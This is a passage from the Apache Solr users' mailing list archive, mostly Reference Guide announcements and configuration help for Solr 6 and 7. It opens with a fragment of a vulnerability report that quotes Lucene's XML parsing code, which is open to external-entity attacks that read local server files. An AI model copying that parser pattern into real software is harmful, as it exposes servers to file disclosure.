>> in order to read arbitrary local files from the solrserver.
>>
>> *Vulnerable code location:*
>> /solr/src/lucene/queryparser/src/java/org/apache/lucene/
>> queryparser/xml/CoreParser.java
>>
>> static Document parseXML(InputStream pXmlFile) throws ParserException {
>> DocumentBuilderFactory dbf = *DocumentBuilderFactory.newInstance*();
>> DocumentBuilder db = null;
>> try {
>>   db = *dbf.newDocumentBuilder*();
>> }
>> catch (Exception se) {
>>   throw new ParserException("XML Parser configuration error", se);
>> }
>> org.w3c.dom.Document doc = null;
>> try {
>>   

Re: Question regarding Upgrading to SolrCloud

2017-10-05 Thread Cassandra Targett
The 7.0 Ref Guide was released Monday.

An overview of the new replica types is available online here:
https://lucene.apache.org/solr/guide/7_0/shards-and-indexing-data-in-solrcloud.html#types-of-replicas.
The replica type is specified when you either create the collection or
add a replica.
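
For example, the Collections API lets you say how many replicas of each type
you want at creation time (the host, collection name, and counts below are
just placeholders):

curl "http://localhost:8983/solr/admin/collections?action=CREATE&name=myCollection&numShards=2&nrtReplicas=1&tlogReplicas=1&pullReplicas=1"

and ADDREPLICA accepts a type parameter (nrt, tlog, or pull) for adding more
of a given type later.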

On Thu, Oct 5, 2017 at 9:01 AM, Erick Erickson  wrote:
> Gopesh:
>
> There is brand new functionality in Solr 7, see: SOLR-10233, the
> "PULL" replica type which is a hybrid SolrCloud replica that uses
> master/slave type replication. You should find this in the reference
> guide, the 7.0 ref guide should be published soon. Meanwhile, that
> JIRA will let you know. Also see .../solr/CHANGES.txt. As Emir says,
> though, it would require ZooKeeper.
>
> Really, though, once you move to SolrCloud (if you do) I'd stick with
> the standard NRT replica type unless I had reason to use one of the
> other two, (TLOG and PULL) as they're for pretty special situations.
>
> All that said, if you're happy with master/slave there's no compelling
> reason to go to SolrCloud, especially for smaller installations.
>
> Best,
> Erick
>
> On Wed, Oct 4, 2017 at 11:46 PM, Gopesh Sharma
>  wrote:
>> Hello Guys,
>>
>> As of now we are running Solr 3.4 with Master Slave Configuration. We are 
>> planning to upgrade it to the latest version (6.6 or 7). Questions I have 
>> before upgrading
>>
>>
>>   1.  Since we do not have a lot of data, is it required to move to 
>> SolrCloud or continue using it Master Slave
>>   2.  Is the support for Master Slave will be there in the future release or 
>> do you plan to remove it.
>>   3.  Can we configure master-slave replication in Solr Cloud, if yes then 
>> do we need zookeeper as well.
>>
>> Thanks,
>> Gopesh Sharma


ANNOUNCE: Apache Solr Reference Guide for 7.0 released

2017-10-02 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide
for 7.0 is now available.

This 1,035-page PDF is the definitive guide to using Apache Solr, the
search server built on Apache Lucene.

The Guide can be downloaded from:
https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-7.0.pdf.

It is also available online at https://lucene.apache.org/solr/guide/7_0.

Included in this release is documentation for the major new features
released in Solr 7.0, with an extensive list of configuration changes
and deprecations you should be aware of while upgrading.

Cassandra


Re: Official PDF Reference Guide for Solr 7.0

2017-09-29 Thread Cassandra Targett
The vote is going on now, and only needs one more +1 to pass (it's
been on long enough). If I get that today, I can start the release
tonight or this weekend and you should see the announcement
Monday/Tuesday next week.

Cassandra

On Fri, Sep 29, 2017 at 2:42 AM, Basso Luca
 wrote:
> Hi all,
> anybody knows when the "Official PDF Reference Guide for Solr 7.0" will be 
> released?
>
> Thanks,
> Luca


Re: Solr 7.0.0 -- can it use a 6.5.0 data repository (index)

2017-09-27 Thread Cassandra Targett
Regarding not finding the issue, JIRA has a problem with queries when
the user is not logged in (see also
https://jira.atlassian.com/browse/JRASERVER-38511 if you're interested
in the details). There's unfortunately not much we can do about it
besides manually edit issues to remove a security setting which gets
automatically added to issues when they are created (which I've now
done for SOLR-11406).

Your best bet in the future would be to log into JIRA before
initiating a search to be sure you aren't missing one that's "hidden"
inadvertently.

Cassandra

On Wed, Sep 27, 2017 at 1:39 PM, Wayne L. Johnson
 wrote:
> First, thanks for the quick response.  Yes, it sounds like the same problem!!
>
> I did a bunch of searching before repoting the issue, I didn't come across 
> that JIRA or I wouldn't have reported it.  My apologies for the duplication 
> (although it is a new JIRA).
>
> Is there a good place to start searching in the future?  I'm a fairly 
> experiences Solr user, and I don't mind slogging through Java code.
>
> Meanwhile I'll follow the JIRA so I know when it gets fixed.
>
> Thanks!!
>
> -Original Message-
> From: Stefan Matheis [mailto:matheis.ste...@gmail.com]
> Sent: Wednesday, September 27, 2017 12:32 PM
> To: solr-user@lucene.apache.org
> Subject: Re: Solr 7.0.0 -- can it use a 6.5.0 data repository (index)
>
> That sounds like 
> https://urldefense.proofpoint.com/v2/url?u=https-3A__issues.apache.org_jira_browse_SOLR-2D11406=DwIFaQ=z0adcvxXWKG6LAMN6dVEqQ=4gLDKHTqOXldY2aQti2VNXYWPtqa1bUKE6MA9VrIJfU=iYU948dQo6G0tKFQUguY6SHOZNZoCOEAEv1sCf4ukcA=HvPPQL--s3bFtNyBdUiz1hNIqfLEVrb4Cu-HIC71dKY=
>   if i'm not mistaken?
>
> -Stefan
>
> On Sep 27, 2017 8:20 PM, "Wayne L. Johnson" 
> wrote:
>
>> I’m testing Solr 7.0.0.  When I start with an empty index, Solr comes
>> up just fine, I can add documents and query documents.  However when I
>> start with an already-populated set of documents (from 6.5.0), Solr
>> will not start.  The relevant portion of the traceback seems to be:
>>
>> Caused by: java.lang.NullPointerException
>>
>> at java.util.Objects.requireNonNull(Objects.java:203)
>>
>> …
>>
>> at java.util.stream.ReferencePipeline.reduce(
>> ReferencePipeline.java:479)
>>
>> at org.apache.solr.index.SlowCompositeReaderWrapper.<init>(
>> SlowCompositeReaderWrapper.java:76)
>>
>> at org.apache.solr.index.SlowCompositeReaderWrapper.wrap(
>> SlowCompositeReaderWrapper.java:57)
>>
>> at org.apache.solr.search.SolrIndexSearcher.<init>(
>> SolrIndexSearcher.java:252)
>>
>> at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:
>> 2034)
>>
>> ... 12 more
>>
>>
>>
>> In looking at the de-compiled code (SlowCompositeReaderWrapper), lines
>> 72-77, and it appears that one or more “leaf” files doesn’t have a
>> “min-version” set.  That’s a guess.  If so, does this mean Solr 7.0.0
>> can’t read a 6.5.0 index?
>>
>>
>>
>> Thanks
>>
>>
>>
>> Wayne Johnson
>>
>> 801-240-4024
>>
>> wjohnson...@ldschurch.org
>>
>>
>>
>>


Re: cwiki has problems ?

2017-08-30 Thread Cassandra Targett
The thing everyone should be aware of is that those strings you see
aren't just strange styles, they are actually lost code blocks - many
of the code examples throughout the old Ref Guide are now missing
(some, for some reason, aren't affected). IOW, if you use the old Ref
Guide, you will be missing critical information.

As Erick mentioned we're working on an automatic redirect from old to
new, but it's also in the Infra group's queue since they manage that
application.

Cassandra

On Wed, Aug 30, 2017 at 10:58 AM, Erick Erickson
 wrote:
> This has happened to several projects, so it's something
> infrastructure related not specific to Solr's CWiki. We've raised a
> ticket for infra to see if they can find the root cause.
>
> Cassandra and Hoss are trying to address the whole
> CWiki-no-longer-current issue.
>
> BTW, I find it useful to download the PDF (upper left corner) for
> whatever version you want and search that locally. I only have 16
> separate ones on my machine ;)
>
> Best,
> Erick
>
> On Wed, Aug 30, 2017 at 8:18 AM, Susheel Kumar  wrote:
>> Now the documentation is being updated at
>>
>> http://lucene.apache.org/solr/guide/6_6/index.html
>>
>> On Wed, Aug 30, 2017 at 10:03 AM, Bernd Fehling <
>> bernd.fehl...@uni-bielefeld.de> wrote:
>>
>>> Can someone fix https://cwiki.apache.org/confluence/ ?
>>>
>>> Seams to have problems with styles?
>>>
>>> Tons of #66solid and #66nonesolid in the text.
>>> E.g. :
>>> https://cwiki.apache.org/confluence/display/solr/
>>> Getting+Started+with+SolrCloud
>>>
>>> Thanks, Bernd
>>>
>>>


Re: Solr Wiki issues

2017-08-28 Thread Cassandra Targett
This appears to have happened for at least one other Apache project
using Apache's Confluence installation:
https://issues.apache.org/jira/browse/INFRA-14971.

You should use the new Ref Guide anyway:
https://lucene.apache.org/solr/guide/post-tool.html. An automatic
redirect from the old location is in the works.
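
For reference, the three missing examples on that page are bin/post
commands along these lines (from memory, so treat it as a sketch; the
file and folder names are just placeholders):

bin/post -c gettingstarted afile.pdf
bin/post -c gettingstarted afolder/
bin/post -c gettingstarted -filetypes ppt,html afolder/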

On Mon, Aug 28, 2017 at 11:32 AM, Erick Erickson
 wrote:
> Hmmm, no it's not just you, I see them too.
>
>
> On Mon, Aug 28, 2017 at 7:45 AM, Steve Pruitt  wrote:
>> Is it just me, or does the Solr Wiki show nonsensical characters for what looks
>> like example commands, etc.?   I tried both Chrome and IE and get the same
>> result.
>>
>> Example, on https://cwiki.apache.org/confluence/display/solr/Post+Tool
>>
>> This shows:
>>
>> Index a PDF file into gettingstarted.
>> #66nonesolid
>>
>> Automatically detect content types in a folder, and recursively scan it for 
>> documents for indexing into gettingstarted.
>> #66nonesolid
>>
>> Automatically detect content types in a folder, but limit it to PPT and HTML 
>> files and index into gettingstarted.
>> #66nonesolid
>>
>> This started showing up a few days ago.
>>
>> Thanks.
>>
>> -S


Re: in-places update solr 5.5.2

2017-07-26 Thread Cassandra Targett
The in-place update section you referenced was added in Solr 6.5. On
p. 224 of the PDF for 5.5, note it says there are only two available
approaches and the section on in-place updates you see online isn't
mentioned. I looked into the history of the online page and the
section on in-place updates was added for Solr 6.5, when SOLR-5944 was
released.

So, unfortunately, unless someone else has a better option for
pre-6.5, I believe it was not possible in 5.5.2.
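
For anyone who does move to 6.5 or later, the schema requirements look
roughly like this (a sketch only; "popularity" is just an illustrative
field name, and the field you update in place must, like _version_, be
non-indexed, non-stored, single-valued, with docValues):

<field name="_version_" type="long" indexed="false" stored="false" docValues="true"/>
<field name="popularity" type="float" indexed="false" stored="false" docValues="true"/>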

Cassandra

On Wed, Jul 26, 2017 at 2:30 AM, elisabeth benoit
 wrote:
> Are in place updates available in solr 5.5.2, I find atomic updates in the
> doc
> https://archive.apache.org/dist/lucene/solr/ref-guide/apache-solr-ref-guide-5.5.pdf,
> which redirects me to the page
> https://cwiki.apache.org/confluence/display/solr/Updating+Parts+of+Documents#UpdatingPartsofDocuments-AtomicUpdates
> .
>
> On that page, for in-place updates, it says
>
> the _version_ field is also a non-indexed, non-stored single valued
> docValues field
>
> when I try this with solr 5.5.2 I get an error message
>
> org.apache.solr.common.SolrException:org.apache.solr.common.SolrException:
> Unable to use updateLog: _version_ field must exist in schema, using
> indexed=\"true\" or docValues=\"true\", stored=\"true\" and
> multiValued=\"false\" (_version_ is not stored
>
>
> What I'm looking for is a way to update one field of a doc without erasing
> the non stored fields. Is this possible in solr 5.5.2?
>
> best regards,
> Elisabeth


Re: uploading solr.xml to zk

2017-07-10 Thread Cassandra Targett
In your command, you are missing the "zk" part of the command. Try:

bin/solr zk cp file:local/file/path/to/solr.xml zk:/solr.xml -z localhost:2181

I see this is wrong in the documentation, I will fix it for the next
release of the Ref Guide.

I'm not sure about how to refer to it - I don't think you have to do
anything? I could be very wrong on that, though.
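
If it helps, the sequence I'd expect to work is roughly this (an
untested sketch; the local path and ZooKeeper address are just
examples). Upload the file once, then start every node in cloud mode
pointing at the same ZooKeeper, and Solr should pick up /solr.xml from
ZooKeeper rather than from solr_home:

bin/solr zk cp file:/home/user1/solr/nodes/day1/solr/solr.xml zk:/solr.xml -z localhost:9983
bin/solr start -c -z localhost:9983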

On Fri, Jul 7, 2017 at 2:31 PM,   wrote:
> The documentation says
>
> If you for example would like to keep your solr.xml in ZooKeeper to avoid 
> having to copy it to every node's solr_home directory, you can push it to
> ZooKeeper with the bin/solr utility
> (Unix example):
> bin/solr cp file:local/file/path/to/solr.xml zk:/solr.xml -z localhost:2181
>
> So I'm trying to push the solr.xml to my local ZooKeeper
>
> solr-6.4.1/bin/solr cp file:/home/user1/solr/nodes/day1/solr/solr.xml
> zk:/solr.xml -z localhost:9983
>
> ERROR: cp is not a valid command!
>
> Afterwards
> When starting up a node how do we refer to the solr.xml inside zookeeper? Any 
> examples?
>
> Thanks
> Imran
>
>
> Sent from Mail for Windows 10
>


Re: Problem in documentation -- authentication JSON fails validation

2017-06-26 Thread Cassandra Targett
I have a commit locally that I will push shortly that fixes the JSON
on that page for 7.0 (and 6.7 if/when it happens). I ran all the JSON
examples through a linter and found a few additional problems that
should be fixed now.
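
Until that fix is published, the corrected command should look like this
(the same curl invocation from the docs, with the JSON fix Chris
describes below):

curl --user solr:SolrRocks -H 'Content-type:application/json' -d '{
  "set-permission": {"name": "update", "role":"dev"},
  "set-permission": {"name": "read", "role":"guest"}
}' http://localhost:8983/solr/admin/authorization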

On Sat, Jun 24, 2017 at 1:13 PM, Chris Ulicny  wrote:
> I haven't actually tested it, but I believe the JSON should probably be
> this:
>
> {
>   "set-permission": {"name": "update", "role":"dev"},
>   "set-permission": {"name": "read", "role":"guest"}
> }
>
> It's missing closing double quotes for 'update' and 'read' and had an extra
> comma after the 'guest' entry.
>
> If I remember correctly, solr doesn't usually have any issues with
> duplicate keys that some JSON validators don't consider valid.
>
>
>
> On Sat, Jun 24, 2017 at 11:17 AM Shawn Heisey  wrote:
>
>> This problem brought to you courtesy of the IRC channel.
>>
>> On this page of the reference guide:
>>
>>
>> https://lucene.apache.org/solr/guide/6_6/rule-based-authorization-plugin.html
>>
>> There is this curl command:
>>
>> curl --user solr:SolrRocks -H 'Content-type:application/json' -d '{
>>   "set-permission": {"name": "update, "role":"dev"},
>>   "set-permission": {"name": "read, "role":"guest"},
>> }' http://localhost:8983/solr/admin/authorization
>>
>> This command doesn't work.  Solr complains about the JSON, and pasting
>> the JSON into a validator web page, I have confirmed that it fails
>> validation.
>>
>> I can't figure out how this JSON *should* be formatted, or I would just
>> fix the documentation.  Hopefully somebody knows what should go here.
>>
>> Thanks,
>> Shawn
>>
>>


Re: [Solr Ref guide 6.6] Search not working

2017-06-23 Thread Cassandra Targett
There is an open JIRA issue to provide this search:
https://issues.apache.org/jira/browse/SOLR-10299.

Yes, it's pretty ironic that the docs for a search engine don't have a
search engine, and I agree it's absolutely necessary, but it's not
done yet.

The title keyword "search" (I hate to even call it "search" - you're
right, today "autocomplete" is a better word for it) can be expanded
relatively easily to include the body of content also. However, this
has not been tested so we have no idea how well it will perform with
the size of our content - the author of that JavaScript says it can be
bad in some situations. This could maybe be a stopgap until a full
search solution is put into place, but maybe the effort to do the
stopgap and make it work well would be better spent implementing Solr
for the Ref Guide instead.

There were 1000 details to doing this transition, and search is the
only feature from the old system that didn't make the cut before
release (and yes, it IS released - see my announcement to this list on
Tuesday). We could have held things up until someone helped make it
happen, or we could move to the new approach and get the 100 other
benefits the change provides the community right away. We chose the
latter.

I do intend to get to search at some point, hopefully sooner rather
than later. But as we say, we're all volunteers here and all of us
have other commitments - to our employers, to our families, etc. -
that sometimes take precedence. If you feel this is something that
should be worked on immediately, you (and anyone reading this) are
strongly encouraged - no, welcomed - to contribute ideas, time, and/or
code to push it forward faster.

On Fri, Jun 23, 2017 at 5:36 AM, alessandro.benedetti
 wrote:
> Hi all,
> I was just using the new Solr Ref Guide[1] (If I understood correctly this
> is going to be the next official documentation for Solr).
>
> Unfortunately, search within the guide works really badly...
> The autocomplete seems to be just on page titles (including headings would
> help a lot).
> If you don't accept any suggestion, it doesn't let you search at all (!!!).
> I tried on Safari and Chrome.
>
> For the reference guide of a search engine, it is not nice to have the search
> feature in this state.
> Actually, being an entry point for developers and users interested in Solr,
> it should showcase an amazing and intuitive search and ease the life of people
> looking for documentation.
> I may be stating the obvious, but concretely, is anybody working to fix this? Is
> this because it has not been released officially yet?
>
>
> [1] https://lucene.apache.org/solr/guide/6_6/
>
>
>
> -
> ---
> Alessandro Benedetti
> Search Consultant, R&D Software Engineer, Director
> Sease Ltd. - www.sease.io
> --
> View this message in context: 
> http://lucene.472066.n3.nabble.com/Solr-Ref-guide-6-6-Search-not-working-tp4342508.html
> Sent from the Solr - User mailing list archive at Nabble.com.


Re: [ANNOUNCE] Apache Solr Reference Guide for 6.6 Released

2017-06-20 Thread Cassandra Targett
I wanted to add a follow-up to my announcement for the Solr 6.6
Reference Guide. This release of the Guide is the first with a new
publication process [1] and A LOT has changed.

First, we have migrated the Ref Guide completely out of Confluence
(aka CWIKI) and now follow a "docs with code" model. This means the
Ref Guide content resides in the same Git repository as the
Lucene/Solr source code. We now treat changes to documentation the
same way we treat any other code change. If you check out the
Lucene/Solr Git repository, you'll also get all of the documentation
and build scripts.

The file format for the "raw" Ref Guide content is AsciiDoc
(Asciidoctor flavor), which is a text markup syntax similar to
Markdown (but with more options than Markdown). We chose this for its
ease of editing - one of our main goals was to knock down barriers for
committers and members of the community to either make or suggest
changes to Solr's official documentation.
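
For anyone who hasn't seen AsciiDoc before, a page looks roughly like
this (the content here is purely illustrative):

== Some Section Title

Body text, with links written as https://lucene.apache.org/solr/[Solr website].

[source,xml]
----
<field name="id" type="string" indexed="true" stored="true"/>
----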

This change required us to develop new tools to publish the Ref
Guide, and we can now generate an HTML version that is published at the
same time as the traditional PDF artifact.

The PDF version is available the same way it always has been. The HTML
version will now be available via the Solr website for ongoing access.
If you are on Solr 6.6 for a while, you'll always be able to access
online docs for 6.6 at that URL.

As for the old Ref Guide in Confluence, it's still online for the
foreseeable future, and we are working on a redirect mechanism to
allow search engines to learn the new location. However, all comments
have been disabled and no further content edits will be made there.
(The new HTML version allows comments, though, so we have not taken
that feature away.)

This new approach allows you to contribute to the project more
directly than before. JIRA issues can be filed for any issues you may
find in the documentation, and you are welcome to submit patches if
you have the time to do so.

These changes took a long time to implement, but we hope they are
considered improvements for the entire community. If you have further
suggestions for us, please feel free to file a JIRA issue.

Cassandra

[1] I described more details of many of the changes in a blog post
about 6 weeks ago:
https://lucidworks.com/2017/05/05/reimagining-the-solr-reference-guide/.

On Tue, Jun 20, 2017 at 10:56 AM, Cassandra Targett <ctarg...@apache.org> wrote:
> The Lucene PMC is pleased to announce the release of the Solr
> Reference Guide for Solr 6.6.
>
> This 966-page PDF is the definitive guide to using Apache Solr, the
> search server built on Apache Lucene.
>
> The Guide can be downloaded from:
> https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-6.6.pdf
>
> It is also available online at:
> https://lucene.apache.org/solr/guide/6_6/


[ANNOUNCE] Apache Solr Reference Guide for 6.6 Released

2017-06-20 Thread Cassandra Targett
The Lucene PMC is pleased to announce the release of the Solr
Reference Guide for Solr 6.6.

This 966-page PDF is the definitive guide to using Apache Solr, the
search server built on Apache Lucene.

The Guide can be downloaded from:
https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-6.6.pdf

It is also available online at:
https://lucene.apache.org/solr/guide/6_6/


[ANNOUNCE] Apache Solr Reference Guide for Solr 6.5 released

2017-04-05 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide
for Solr 6.5 has been released.

This 782-page PDF is the definitive guide to using Apache Solr, the
search server built on Apache Lucene.

The Guide can be downloaded from:

https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-6.5.pdf


Apache Solr Reference Guide for Solr 6.4 released

2017-02-17 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide
for Solr 6.4 has been released.

This 763-page PDF is the definitive guide to using Apache Solr, the
search server built on Apache Lucene. The Guide can be downloaded
from:

https://dist.apache.org/repos/dist/release/lucene/solr/ref-guide/apache-solr-ref-guide-6.4.pdf

Cassandra


Re: ClassicIndexSchemaFactory with Solr 6.3

2016-11-28 Thread Cassandra Targett
I'm not seeing how the documentation is wrong here. It says:

"When a <schemaFactory/> is not explicitly declared in a
solrconfig.xml file, Solr implicitly uses a
ManagedIndexSchemaFactory"

IOW, managed schema is the default, and you may not find a
schemaFactory definition in your file. When a schemaFactory is not
defined, it is by default ManagedIndexSchemaFactory (see also
https://issues.apache.org/jira/browse/SOLR-8131).

The page then goes on to explain how to enable
ClassicIndexSchemaFactory if you choose. Take a look at the last
section, "Changing from Managed Schema to Manually Edited schema.xml".
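
For the record, the switch itself is a single line added to
solrconfig.xml (plus keeping a schema.xml in your conf directory):

<schemaFactory class="ClassicIndexSchemaFactory"/>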

Cassandra

On Sat, Nov 26, 2016 at 12:11 PM, Shawn Heisey  wrote:
> On 11/26/2016 10:58 AM, Furkan KAMACI wrote:
>> I'm trying Solr 6.3. I don't want to use Managed Schema. It was OK for
>> Solr 5.x. However solrconfig.xml of Solr 6.3 doesn't have a
>> ManagedIndexSchemaFactory definition. Documentation is wrong at this
>> point (
>> https://cwiki.apache.org/confluence/display/solr/Schema+Factory+Definition+in+SolrConfig
>> ) How can I use ClassicIndexSchemaFactory with Solr 6.3?
>
> I believe that the managed schema is default now if you don't specify
> the factory to use.  I checked basic_configs in 6.2.1 and that
> definition did not appear to be present.  You'll probably have to *add*
> the schema factory definition to the config.  It looks like it's a
> top-level element, under <config>.  It's only one line.
>
> Thanks,
> Shawn
>


Apache Solr Reference Guide for 6.3 released

2016-11-16 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide
for Solr 6.3 has been released.

This 736-page PDF is the definitive guide to using Apache Solr, the
blazing fast search server built on Apache Lucene. The Guide can be
downloaded from:

https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-6.3.pdf

Cassandra


Solr Reference Guide for Solr 6.2 released

2016-09-13 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide
for Solr 6.2 has been released.

This 717-page PDF is the definitive guide to using Apache Solr, the
blazing fast search server built on Apache Lucene. It can be
downloaded from:

https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-6.2.pdf

- Cassandra


Re: How to create highlight search component using Config API

2016-07-08 Thread Cassandra Targett
If you already have highlighting defined from one of the default
configsets, you can see an example of how the JSON is structured with
a Config API request. I assume you already tried that, but pointing it
out just in case.

Defining a highlighter with the Config API is a bit confusing to be
honest, but I worked out something that works:

{"add-searchcomponent": {"highlight": {"name":"myHighlight",
"class":"solr.HighlightComponent","": {"gap": {"default":"true",
"name": "gap", "class":"solr.highlight.GapFragmenter",
"defaults":{"hl.fragsize":100}}},"html":[{"default": "true","name":
"html","class": "solr.highlight.HtmlFormatter","defaults":
{"hl.simple.pre":"<em>",
"hl.simple.post":"</em>"}},{"name": "html","class":
"solr.highlight.HtmlEncoder"}]}}}

Note there is an empty string after the initial class definition
(shown as ""). That lets you then add the fragmenters.

(I tried to prettify that, but my mail client isn't cooperating. I'm
going to add this example to the Solr Ref Guide, though, so it might be
easier to see there in a few minutes.)
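
In case it saves someone a step, that JSON gets POSTed to the
collection's config endpoint, e.g. (the collection name is just an
example, and highlight.json is a local file holding the payload above):

curl http://localhost:8983/solr/mycollection/config -H 'Content-type:application/json' -d @highlight.json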

Hope it helps -
Cassandra

On Wed, Jun 29, 2016 at 8:00 AM, Alexandre Drouin
 wrote:
> Hi,
>
> I'm trying to create a highlight search component using the Config API of 
> Solr 6.0.1 however I cannot figure out how to include the elements 
> fragmenter, formatter, encoder, etc...
>
> Let's say I have the following component:
>
> <searchComponent class="solr.HighlightComponent" name="myHighlightingComponent">
>   <highlighting>
>     <fragmenter name="gap" default="true" class="solr.highlight.GapFragmenter">
>       <defaults>
>         <int name="hl.fragsize">100</int>
>       </defaults>
>     </fragmenter>
>     <formatter name="html" default="true" class="solr.highlight.HtmlFormatter">
>       <defaults>
>         <str name="hl.simple.pre"><![CDATA[<em>]]></str>
>         <str name="hl.simple.post"><![CDATA[</em>]]></str>
>       </defaults>
>     </formatter>
>     <encoder name="html" class="solr.highlight.HtmlEncoder"/>
>   </highlighting>
> </searchComponent>
>
> From what I can see from the documentation my JSON should look a bit like 
> this:
>
> {
>   "add-searchcomponent":{
>     "name":"myHighlightingComponent",
>     "class":"solr.HighlightComponent",
>     ??
>   }
> }
>
> However I have no idea how to define the 2 fragmenters or the encoder.  Any
> help is appreciated.
>
> Thanks
> Alex
>


ANNOUNCE: Solr Reference Guide for 6.1 Released

2016-06-28 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide
for 6.1 has been released.

The 700 page PDF is the definitive guide to Solr. It can be downloaded from:

https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-6.1.pdf


Solr Reference Guide for 6.0 Released

2016-04-25 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Apache Solr Reference
Guide for 6.0 has been released. The Guide has been updated
extensively for 6.0, with new sections for Parallel SQL and Cross Data
Center Replication.

This 660 page PDF is the definitive guide to Solr and can be
downloaded from:
https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-6.0.pdf

-- Cassandra


Re: Solrcloud Batch Indexing

2016-03-08 Thread Cassandra Targett
There is an open source Hive -> Solr SerDe available that might be worth
checking out: https://github.com/lucidworks/hive-solr. I'm not sure how it
would work with the source table being rebuilt every day since it uses
Hive's external tables, but it might be something you could extend.

On Mon, Mar 7, 2016 at 4:40 PM, Erick Erickson 
wrote:

> Bin:
>
> The MRIT/Morphlines only makes sense if you have lots more
> nodes devoted to the M/R jobs than you do Solr shards since the
> actual work done to index a given doc is exactly the same either
> with MRIT/Morphlines or just sending straight to Solr.
>
> A bit of background here. I mentioned that MRIT/Morphlines uses
> EmbeddedSolrServer. This is exactly Solr as far as the actual indexing
> is concerned. So using --go-live is not buying you anything and, in fact,
> is costing you quite a bit over just using <2> to index directly to Solr
> since
> the index has to be copied around. I confess I'm surprised that --go-live
> is taking that long. basically it's just copying your index up to Solr so
> perhaps there's an I/O problem or some such.
>
> OK, I'm lying a little bit here, _if_ you have more than one replica per
> shard, then indexing straight to Solr will cost you (anecdotally)
> 10-15% in indexing speed. But if this is a single replica/shard (i.e.
> leader-only), then it's near enough to being the exact same.
>
> Anyway, at the end of the day, the index produced is self-contained.
> You could even just copy it to your shards (with Solr down), and then
> bring up your Solr nodes on a non-HDFS-based Solr.
>
> But frankly I'd avoid that and benchmark on <2> first. My expectation
> is that you'll be fine there and see indexing roughly on par with your
> MRIT/Morphlines.
>
> Now, all that said, indexing 300M docs in 'a few minutes' is a bit
> surprising.
> I'm really wondering if you're not being fooled by something "odd". Have
> you compared the identical runs with and without --go-live?
>
> _Very_ often, the bottleneck isn't Solr at all, it's the data acquisition,
> so be
> careful when measuring that the Solr CPU's are pegged... otherwise
> you're bottlenecking upstream of Solr. A super-simple way to figure that
> out is to comment out the solrServer.add(list, 1) line in <2> or just
> run MRIT/Morphlines without the --go-live switch.
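>
> In case it's useful, the client-side loop <2> uses is roughly this shape
> (an untested sketch; CloudSolrClient is the current name for
> CloudSolrServer, and the ZK address, collection and field names here are
> just placeholders):
>
> import java.util.ArrayList;
> import java.util.List;
> import org.apache.solr.client.solrj.impl.CloudSolrClient;
> import org.apache.solr.common.SolrInputDocument;
>
> public class BulkLoader {
>   public static void main(String[] args) throws Exception {
>     // Connect via ZooKeeper so updates are routed straight to shard leaders.
>     CloudSolrClient client = new CloudSolrClient("zk1:2181,zk2:2181,zk3:2181");
>     client.setDefaultCollection("mycollection");
>     List<SolrInputDocument> batch = new ArrayList<>();
>     for (int i = 0; i < 1000000; i++) {      // stand-in for your real data source
>       SolrInputDocument doc = new SolrInputDocument();
>       doc.addField("id", Integer.toString(i));
>       doc.addField("text_t", "row " + i);
>       batch.add(doc);
>       if (batch.size() == 1000) {            // send in groups of 1,000
>         client.add(batch);
>         batch.clear();
>       }
>     }
>     if (!batch.isEmpty()) client.add(batch);
>     client.commit();                         // one commit at the very end
>     client.close();
>   }
> }
>
> Run several of these in parallel (or several threads sharing one client)
> if you want to keep the Solr CPUs busy.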
>
> BTW, with <2> you could run with as many jobs as you wanted to run
> the Solr servers flat-out.
>
> FWIW,
> Erick
>
> On Mon, Mar 7, 2016 at 1:14 PM, Bin Wang  wrote:
> > Hi Eric,
> >
> > Thanks for your quick response.
> >
> > From the data's perspective, we have 300+ million rows and believe it or
> > not, the source data is from a relational database (Hive) and the database
> is
> > rebuilt every day (I am as frustrated as most of you who read this but it
> > is what it is) and potentially need to store actually all of the fields.
> > In this case, I have to figure out a solution to quickly index 300+
> million
> > rows as fast as I can.
> >
> > I am still at a stage evaluating all the different solutions, and I am
> > sorry that I haven't really benchmarked the second approach yet.
> > I will find a time to run some benchmark and share the result with the
> > community.
> >
> > Regarding the approach that I suggested - mapreduce Lucene indexes, do
> you
> > think it is feasible and does that worth the effort to dive into?
> >
> > Best regards,
> >
> > Bin
> >
> >
> >
> > On Mon, Mar 7, 2016 at 1:57 PM, Erick Erickson 
> > wrote:
> >
> >> I'm wondering if you need map reduce at all ;)...
> >>
> >> The achilles heel with M/R viz: Solr is all the copying around
> >> that's done at the end of the cycle. For really large bulk indexing
> >> jobs, that's a reasonable price to pay..
> >>
> >> How many docs and how would you characterize them as far
> >> as size, fields, etc? And what are your time requirements? What
> >> kind of docs?
> >>
> >> I'm thinking this may be an "XY Problem". You're asking about
> >> a specific solution before explaining the problem.
> >>
> >> Why do you say that Solr is not really optimized for bulk loading?
> >> I took a quick look at <2> and the approach is sound. It batches
> >> up the docs in groups of 1,000 and uses CloudSolrServer as it should.
> >> Have you tried it? At the end of the day, MapReduceIndexerTool does
> >> the same work to index a doc as a regular Solr server would via
> >> EmbeddedSolrServer so if the number of tasks you have running is
> >> roughly equal to the number of shards, it _should_ be roughly
> >> comparable.
> >>
> >> Still, though, I have to repeat my question about how many docs you're
> >> talking here. Using M/R inevitably adds complexity, what are you trying
> >> to gain here that you can't get with several threads in a SolrJ client?
> >>
> >> Best,
> >> Erick
> >>
> >> On Mon, Mar 7, 2016 at 12:28 PM, Bin Wang  wrote:
> >> > Hi there,
> >> >
> >> > I have a fairly 

[ANNOUNCE] Apache Solr Ref Guide for v5.4

